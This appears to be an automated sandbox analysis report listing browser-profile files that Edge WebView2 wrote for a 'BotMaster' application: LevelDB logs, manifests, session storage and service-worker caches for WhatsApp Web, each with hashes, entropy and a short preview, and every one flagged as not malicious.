                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\CacheStorage\0bf6ab7f94a21cdc9c1649f884333ec20f40a544\index.txt~RF6246ff.TMP (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):136
                                                                                                                                                                                                                Entropy (8bit):4.983953148659464
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Vfyy+Q99sQRFXd14iUIyTXZDR8f5GWWiCNO5GWWigk:M7Q99XXzRRu4YRiC4YRigk
                                                                                                                                                                                                                MD5:176F3C74C7B6774B0C05EF2BB0FF4D58
                                                                                                                                                                                                                SHA1:92C4063537326CC6E662F47CFC6525203CD63E5E
                                                                                                                                                                                                                SHA-256:C7FF6E5F0338779F87BCF0EDBD4C0E076E4788A9FC7489C3FCE7D3FB341D7B29
                                                                                                                                                                                                                SHA-512:86B7FDE9A3163337033945335725100DB076A2D261651B2A58171F287CFDBFDDCD642FEE47ABF4190F4B92628E22DED3BF51F9D4726B720C0A3743D13A407BA3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.L..wa_web_user_prefs_cache_store.$2c729997-e290-497a-ab91-2215fe9755ea...(.0...https://web.whatsapp.com/..https://web.whatsapp.com/ .(.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):214
                                                                                                                                                                                                                Entropy (8bit):4.852649195693123
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:chXUQI2xH8BzNmeOzfDJRiOd/rXc4IM1M/:cyQI2xcBzNm5zDH9JrXc5Ma
                                                                                                                                                                                                                MD5:4DE0E5223AC7310893787791D812BCF3
                                                                                                                                                                                                                SHA1:9F9B639DC85B0D9C98475F23529DF07A86489075
                                                                                                                                                                                                                SHA-256:4D6BE3E5DECE22BF8771F50155ED3F8201FAC945181A626186379B3D22A973DA
                                                                                                                                                                                                                SHA-512:C077C5B55F9C6EE29B6C5B33B6A91AF2F6C81C0A6C9991DC19804D136B7A1F26456AC9A45A6EB2F4BA0B38E066CC10E83BD15195A84478CEBF9D7BD01EC500D3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2..?.@................REG:https://web.whatsapp.com/.0..REGID_TO_ORIGIN:0MeN+.................URES:0..PRES:0.J4...................PRES:0

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):321
                                                                                                                                                                                                                Entropy (8bit):5.259194617135787
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:FQXpgs1wknaZ5KrWLYQV+df/a252KLlvQXoJL+q2PwknaZ5KrWLYQV+df/a2ZIF2:SXpgLrHUdnxL6Xoh+vYrHUdnJ2FUv
                                                                                                                                                                                                                MD5:652902F2720FF3780357F8ECBE05A4A7
                                                                                                                                                                                                                SHA1:C22F67426C58A6D9F203DE26770B7605FF764D0A
                                                                                                                                                                                                                SHA-256:065995B7A093C97B844427CD1B07AF2E9A1208DF5BB9787B26FBE6C5E1190BEB
                                                                                                                                                                                                                SHA-512:34F2BD35F2FB3ABEC3DEE6C6151301F3E8D15DE95EAF5315866CFC628F1FE643D3967A8D7D384D615EED95045A0858AC425C7BDBFC9C63435AE8B03D85234547
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:2024/03/10-17:46:26.423 c9c Creating DB C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\Database since it was missing..2024/03/10-17:46:26.583 c9c Reusing MANIFEST C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3447669
                                                                                                                                                                                                                Entropy (8bit):5.674516550872737
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:49152:R39IgYL0D6hSmvPZoOhimPp86D7b0tGPS3Bo1NjBfc33LcN6IdbcvodvPEneboJ2:R39JYL0Dolas
                                                                                                                                                                                                                MD5:3A759235B716E139342793E84A94DB06
                                                                                                                                                                                                                SHA1:85E9E6FA3E90FF08FF1A2E6F202B527C7D380282
                                                                                                                                                                                                                SHA-256:D27C5188B9A839C01405D7324A4F21296E5F73F05EC664D5F3B2D43901839A75
                                                                                                                                                                                                                SHA-512:092AA46D28DEF25EB502A49314264C095E34CD7C201CBEEFD1C66E360AD5B67CA460A4187DE86F7D28ECDCBBDA47601EAE31D426C59B7BEA8946DC06E2A8FEC7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m..........rSG.....0/*! Copyright (c) 2024 WhatsApp Inc. All Rights Reserved. */(()=>{var __webpack_modules__={14462:(e,t,n)=>{!function(e){"use strict";var t=function(e){var t,n=new Float64Array(16);if(e)for(t=0;t<e.length;t++)n[t]=e[t];return n},r=function(){throw new Error("no PRNG")},i=new Uint8Array(16),o=new Uint8Array(32);o[0]=9;var a=t(),s=t([1]),l=t([56129,1]),u=t([30883,4953,19914,30187,55467,16705,2637,112,59544,30585,16505,36039,65139,11119,27886,20995]),c=t([61785,9906,39828,60374,45398,33411,5274,224,53552,61171,33010,6542,64743,22239,55772,9222]),d=t([54554,36645,11616,51542,42930,38181,51040,26924,56412,64982,57905,49316,21502,52590,14035,8553]),p=t([26200,26214,26214,26214,26214,26214,26214,26214,26214,26214,26214,26214,26214,26214,26214,26214]),f=t([41136,18958,6951,50414,58488,44335,6150,12099,55207,15867,153,11085,57099,20417,9344,11139]);function _(e,t,n,r){e[t]=n>>24&255,e[t+1]=n>>16&255,e[t+2]=n>>8&255,e[t+3]=255&n,e[t+4]=r>>24&255,e[t+5]=r>>16&255,e[t+6]=r>

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):24
                                                                                                                                                                                                                Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:m+l:m
                                                                                                                                                                                                                MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m..................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):48
                                                                                                                                                                                                                Entropy (8bit):2.9972243200613975
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:oJNTE3lLOTl:ovgIl
                                                                                                                                                                                                                MD5:98E9B194719194730F28FDDAF7D6EAC5
                                                                                                                                                                                                                SHA1:E7ED16EEC29D75F324A0D347406D1F8DD0DB370B
                                                                                                                                                                                                                SHA-256:E2B8BD6C712C09E3CD2A1D276408030079DE9D247E10243217EBCADA8CC435F6
                                                                                                                                                                                                                SHA-512:2DB42153E1F2856B58E4BA9EE46D4DB137021A119852984C7E336FC3EB9C9E3E62E3DFCF44DC177E675BCE46445107A9B59F56836A44E9A1B8B6F2D30145C7DF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:(.....V.oy retne........................Hw.v.q/.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):48
                                                                                                                                                                                                                Entropy (8bit):2.9972243200613975
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:oJNTE3lLOTl:ovgIl
                                                                                                                                                                                                                MD5:98E9B194719194730F28FDDAF7D6EAC5
                                                                                                                                                                                                                SHA1:E7ED16EEC29D75F324A0D347406D1F8DD0DB370B
                                                                                                                                                                                                                SHA-256:E2B8BD6C712C09E3CD2A1D276408030079DE9D247E10243217EBCADA8CC435F6
                                                                                                                                                                                                                SHA-512:2DB42153E1F2856B58E4BA9EE46D4DB137021A119852984C7E336FC3EB9C9E3E62E3DFCF44DC177E675BCE46445107A9B59F56836A44E9A1B8B6F2D30145C7DF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:(.....V.oy retne........................Hw.v.q/.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF623665.TMP (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):48
                                                                                                                                                                                                                Entropy (8bit):2.9972243200613975
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:oJNTE3lLOTl:ovgIl
                                                                                                                                                                                                                MD5:98E9B194719194730F28FDDAF7D6EAC5
                                                                                                                                                                                                                SHA1:E7ED16EEC29D75F324A0D347406D1F8DD0DB370B
                                                                                                                                                                                                                SHA-256:E2B8BD6C712C09E3CD2A1D276408030079DE9D247E10243217EBCADA8CC435F6
                                                                                                                                                                                                                SHA-512:2DB42153E1F2856B58E4BA9EE46D4DB137021A119852984C7E336FC3EB9C9E3E62E3DFCF44DC177E675BCE46445107A9B59F56836A44E9A1B8B6F2D30145C7DF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:(.....V.oy retne........................Hw.v.q/.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF631db7.TMP (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):48
                                                                                                                                                                                                                Entropy (8bit):2.9972243200613975
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:oJNTE3lLOTl:ovgIl
                                                                                                                                                                                                                MD5:98E9B194719194730F28FDDAF7D6EAC5
                                                                                                                                                                                                                SHA1:E7ED16EEC29D75F324A0D347406D1F8DD0DB370B
                                                                                                                                                                                                                SHA-256:E2B8BD6C712C09E3CD2A1D276408030079DE9D247E10243217EBCADA8CC435F6
                                                                                                                                                                                                                SHA-512:2DB42153E1F2856B58E4BA9EE46D4DB137021A119852984C7E336FC3EB9C9E3E62E3DFCF44DC177E675BCE46445107A9B59F56836A44E9A1B8B6F2D30145C7DF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:(.....V.oy retne........................Hw.v.q/.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Session Storage\000001.dbtmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Session Storage\000003.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                Size (bytes):839
                                                                                                                                                                                                                Entropy (8bit):4.64539756838511
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:Ra2NkRyvQv9wX797O6T2A9kuqioDlDaNUYtV:j+MIv9IZVLnqikh2jV
                                                                                                                                                                                                                MD5:2DEC4BB43DC16C738F163EB60263C7C2
                                                                                                                                                                                                                SHA1:5A7FB4601558D82974EAF152D276F68534C19EE9
                                                                                                                                                                                                                SHA-256:398309461A558DD10151DA32971F6FAD32957BC868E9BD464EAA7ACC8DFA964A
                                                                                                                                                                                                                SHA-512:64F4E52BD5497F1699A18816D2E4E3E320074C8A531FF95158BFA274E04C311F43382720951222BB48E05C1D91C4E8846FE0C63458068825440CCB013CAC4610
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:*...#................version.1..namespace-.V[ g................next-map-id.1.Hnamespace-713f556c_910d_40d1_a172_e722be0ef728-https://web.whatsapp.com/.0...g................next-map-id.2.Hnamespace-70fa0c46_9b6c_4169_9e46_823396e8c455-https://www.whatsapp.com/.1...<9................map-0-storage_test.s.t.o.r.a.g.e._.t.e.s.t.<....................map-1-TabId.r.d.b.m.l.w...map-1-sp_pi..{.".p.a.g.e.I.n.f.o.".:.{.".s.c.r.i.p.t.P.a.t.h.".:.".W.A.X.W.h.a.t.s.A.p.p.W.W.W.C.o.n.t.r.o.l.l.e.r.".,.".c.a.t.e.g.o.r.y.T.o.k.e.n.".:.".a.1.f.3.c.5.1.3.".,.".e.x.t.r.a.D.a.t.a.".:.{.".i.m.p._.i.d.".:.".1.m.O.K.L.b.9.S.o.g.6.1.9.Y.i.K.2.".,.".e.f._.p.a.g.e.".:.n.u.l.l.,.".u.r.i.".:.".h.t.t.p.s.:././.w.w.w...w.h.a.t.s.a.p.p...c.o.m./.".}.}.,.".c.l.i.c.k.P.o.i.n.t.".:.n.u.l.l.,.".t.i.m.e.".:.1.7.1.0.0.8.9.1.9.3.9.1.7.}...map-1-__test__1710089193895

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Session Storage\CURRENT (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Session Storage\LOG

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):307
                                                                                                                                                                                                                Entropy (8bit):5.164852142972734
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:FQVWqdD1wknaZ5KrWLYQV+dWQM72KLlvQVkMM+q2PwknaZ5KrWLYQV+dWQMxIFUv:SzyrHUdIL6uN+vYrHUdHFUv
                                                                                                                                                                                                                MD5:DB1368132AB4D2F34E82A04B15A1327E
                                                                                                                                                                                                                SHA1:699750F141B8C3FB59A196880525FE8C6FA781DA
                                                                                                                                                                                                                SHA-256:28C83F7DE338216812A0A15A42205D43A535D5A34A725973CC2FA90956220865
                                                                                                                                                                                                                SHA-512:BB9A9FAFA0DDA277F3F34A2D4A0B2695402699F1455C57AA573C49CBD22AD75D82016AB1E2162569C318C56090FA22ECEDF4BCCAA35B884B683C861CF1E0C67E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:2024/03/10-17:46:06.092 10ac Creating DB C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Session Storage since it was missing..2024/03/10-17:46:06.130 10ac Reusing MANIFEST C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Session Storage/MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Session Storage\MANIFEST-000001

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Site Characteristics Database\000001.dbtmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Site Characteristics Database\000003.log

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                Entropy (8bit):3.473726825238924
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:41tt0diERGn:et084G
                                                                                                                                                                                                                MD5:148079685E25097536785F4536AF014B
                                                                                                                                                                                                                SHA1:C5FF5B1B69487A9DD4D244D11BBAFA91708C1A41
                                                                                                                                                                                                                SHA-256:F096BC366A931FBA656BDCD77B24AF15A5F29FC53281A727C79F82C608ECFAB8
                                                                                                                                                                                                                SHA-512:C2556034EA51ABFBC172EB62FF11F5AC45C317F84F39D4B9E3DDBD0190DA6EF7FA03FE63631B97AB806430442974A07F8E81B5F7DC52D9F2FCDC669ADCA8D91F
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.On.!................database_metadata.1

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Site Characteristics Database\CURRENT (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):335
                                                                                                                                                                                                                Entropy (8bit):5.191475338948764
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:FQVUjOR1wknaZ5KrWLYQV+dUUh2gr52KLlvQVUxN+q2PwknaZ5KrWLYQV+dUUh2A:S+i0rHUdrhHJL6+xN+vYrHUdrhHh2FUv
                                                                                                                                                                                                                MD5:7BE0A6979609D1720812562A222C7301
                                                                                                                                                                                                                SHA1:D7FD253108DB023A5CB64B1BBA023B956ADF0FA5
                                                                                                                                                                                                                SHA-256:F9FA0522560A6A478AED204FEABD0758E53F15F7A2328AD9D0DDAADE32FA171B
                                                                                                                                                                                                                SHA-512:3F1A92A847EA9B1CA709FE6C598DB133506F680D2BE114E59A5221E3325828586677B1D911B7B6D04ADF95568D400DB940162C2B28083E23F9A2BD286FD66390
                                                                                                                                                                                                                Malicious:false
